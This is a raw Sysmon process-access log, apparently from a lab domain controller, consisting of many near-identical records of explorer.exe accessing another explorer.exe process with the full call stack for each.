16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 